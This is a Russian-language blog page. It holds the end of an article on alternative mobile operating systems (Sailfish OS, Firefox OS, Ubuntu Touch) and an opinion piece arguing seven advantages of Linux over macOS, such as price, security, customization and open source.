Первыми устройствами на базе Sailfish OS стали смартфоны Jolla, получившие горячую поддержку поклонников Nokia. Сегодня данную операционную систему официально поддерживает более десяти мобильных устройств. Хотя Sailfish OS имеет закрытый исходный код, ее вполне можно рассматривать, как альтернативу Android, iOS и Windows.

Firefox OS [продажи прекращены]


Несложно догадаться, что Firefox OS является опенсорс-проектом компании Mozilla, создателем интернет-браузера Mozilla Firefox. В свое время объявление о выпуске смартфонов на базе Firefox OS стоимостью всего 25$ наделало немало шума. Целевой аудиторией проекта были развивающиеся рынки вроде Бразилии и Индии. К сожалению, оказалось, что для повторения успеха Raspberry Pi одного лишь низкого ценника недостаточно. Как и в случае с Tizen, устройства ZTE на основе Firefox OS не обрели популярности и в конце 2015 года Mozilla прекратила их продажи. Однако эксперименты с Firefox OS продолжаются.


Ubuntu Touch [поддерживается сообществом]


В 2013 году король десктопных операционных систем Linux обзавелся мобильной версией — Ubuntu Touch. Компания Canonical запустила краудфандинговую кампанию, намереваясь собрать 32 миллиона долларов на разработку первого смартфона Ubuntu — Edge. Собрать удалось только 12 миллионов, но и эта сумма стала рекордной.

После провалившейся краудфандинговой кампании Canonical удалось выпустить Ubuntu Phone совместно с испанским производителем мобильных устройств bq и китайским — Meizu.Впоследствии появилось и несколько других моделей на Ubuntu Touch. В 2017 году в Canonical приняли решение прекратить разработку своей мобильной ОС, но сообщество UBports до сих пор поддерживает Ubuntu Touch на плаву.

April 6, 2019
0
4

7 преимуществ Linux перед Mac


Наш telegram канал : @Save and betray

Вступай в наши ряды




Как Linux, так и macOS, являются Unixподобными операционными системами, поддерживающими управление командами с помощью командных оболочек Unix, BASH и других. Обе ОС проигрывают Windows по количеству написанных под них приложений и игр. Собственно, на этом сходство между Linux и macOS заканчивается. MacOS нежно любима графическими дизайнерами и видеоредакторами, в то время как Linux пользуется расположением разработчиков и сисадминов.

Так какая же из двух систем лучше? Этот вопрос каждый решает для себя. Мы же предлагаем вам ознакомиться с семью практическими и идеологическими преимуществами Linux перед Mac.

1. Цена


Предположим, что компьютер вам нужен, в основном, для поиска информации в интернете, просмотра фильмов, скачивания фото и создания документов. При этом вы хотите, чтобы ваша операционная система была безопасной.

Вы можете удовлетворить свою потребность, купив бюджетный ноутбук/ПК и бесплатно установив на него дистрибутив Linux. Другой вариант — приобрести дорогостоящий MacBook.Какой из этих вариантов лучше? Все зависит от ваших предпочтений.

Многие вполне довольны ОС Linux. Однако, если вы, скажем, профессионально занимаетесь музыкой или видеосъемкой, возможно, вам лучше выбрать Mac и тем самым получить доступ к приложениям Logic Pro X и Final Cut Pro.

2. Возможность выбора компьютера


Операционная система Linux распространяется бесплатно. Ее можно установить на компьютеры любой конфигурации. Даже если у вас старый ПК — Linux будет на нем работать. Просто выберите подходящий дистрибутив.

А вот Mac OS предназначена исключительно для компьютеров Apple. Если вы решили сами собрать компьютер или приобрести бюджетный ноутбук (с DOS) и установить на них Mac OS, эта затея вам вряд ли удастся.

Вообще, способы установить macOS на устройства, отличные от Apple, существуют. Однако процедура это сложная и требующая высокого уровня подготовки. В связи с чем возникает резонный вопрос — а стоит ли оно того?

Итак, если установить Linux можно практически на любой ПК, то Mac OS сильно ограничивает вас в выборе.

3. Безопасность


Многие поют дифирамбы безопасности iOS и Mac. Что ж, возможно, эти ОС безопаснее, чем Windows, но Linux в этом плане они уступают. Увы, это не преувеличение. Шпионское и рекламное ПО для macOS существует и его количество растет с каждым днем. Бывали случаи, когда причиной медленной работы компьютера Mac оказывался взломанный браузер.

Вообще, безопасных на 100% операционных систем не бывает. Уязвимости есть и у Linux, однако они своевременно и эффективно устраняются. К счастью, в мире Linux пока не существует автозапускающихся и распространяющихся через браузер вирусов. И это еще одна причина использовать Linux, а не Mac.

4. Персонализация


Вам не нравится какой-то элемент ОС Linux? Измените его или вообще удалите. Вот так просто!

Допустим, вам не нравится окружение рабочего стола Gnome в Ubuntu 18.04.1. Поменяйте его на KDE Plasma или установите какое-нибудь из расширений Gnome. Mac OS такой свободы персонализации не дает.


Кстати, на Linux вы можете даже менять исходный код ОС, что-то добавлять и удалять. Конечно, это потребует определенных технических знаний, но, так или иначе, у вас есть возможность создать собственную персонализированную ОС. А есть ли она на Mac OS?

Кроме того, Linux имеет множество дистрибутивов, направленных на решение разных задач. Например, если вам нужно копировать интерфейс Mac OS, на помощь придет дистрибутив Elementary OS. Хотите установить легковесный дистрибутив Linux на старый компьютер? У вас есть как минимум 10 вариантов. Mac OS такой гибкостью не отличается.

5. Помощь в построении карьеры [в сфере IT]


Данный пункт несколько спорный и относится, прежде всего, к студентам и молодым специалистам в области IT-технологий.

В процессе изучения ОС Linux вы получите ценный опыт, который пригодится вам при устройстве на работу. Любой IT-специалист должен уметь работать с терминалом, ориентироваться в файловой системе и устанавливать программы с помощью командной строки. Сами того не осознавая, вы научитесь тому, чему IT-компании специально обучают новых сотрудников.

Кроме того, зная Linux, вы сможете овладеть и множеством смежных технологий типа Cloud, Kubernetes или Sysadmin, и получить соответствующие сертификаты. С таким «багажом» шансы найти хорошую работу значительно возрастут!

6. Надежность


Вы когда-нибудь задумывались, почему Linux работает лучше других операционных систем на любом сервере? Потому что эта ОС самая стабильная! Почему Linux стабильнее, чем Mac OS?

Ответ прост — потому что она дает пользователю больше полномочий и одновременно защищает его данные. Mac OS не позволяет полностью управлять своей платформой, что облегчает ее использование и улучшает пользовательский опыт. На Linux вы можете делать все, что хотите, что (в некоторых случаях) может сказаться на пользовательском опыте негативно. Зато вы получаете более высокую надежность.

7. Открытый исходный код


Данный аспект заботит не каждого пользователя. Но для некоторых наличие открытого исходного кода является принципиальным моментом. Тем более, что многие из перечисленных достоинств Linux напрямую связаны с «опенсорсностью» этой операционной системы.

Для тех, кто не в курсе, поясним: ПО с открытым исходным кодом позволяет видеть и вносить изменения в код программы. В случае с Mac такие действия доступны исключительно компании Apple. Даже если вы обладаете всеми необходимыми знаниями, посмотреть исходный код Mac OS у вас не получится.

Иными словами, пользуясь Mac, вы получаете автомобиль, но не можете заглянуть под капот. И это печально.

Заключение

Итак, теперь вы знаете, чем Linux лучше Mac OS. Каковы ваши мысли по этому поводу? Достаточно ли названных причин, чтобы вы предпочли Linux Mac OS? Если нет, то какая ОС вам нравится и почему?

April 6, 2019
0
3
Show more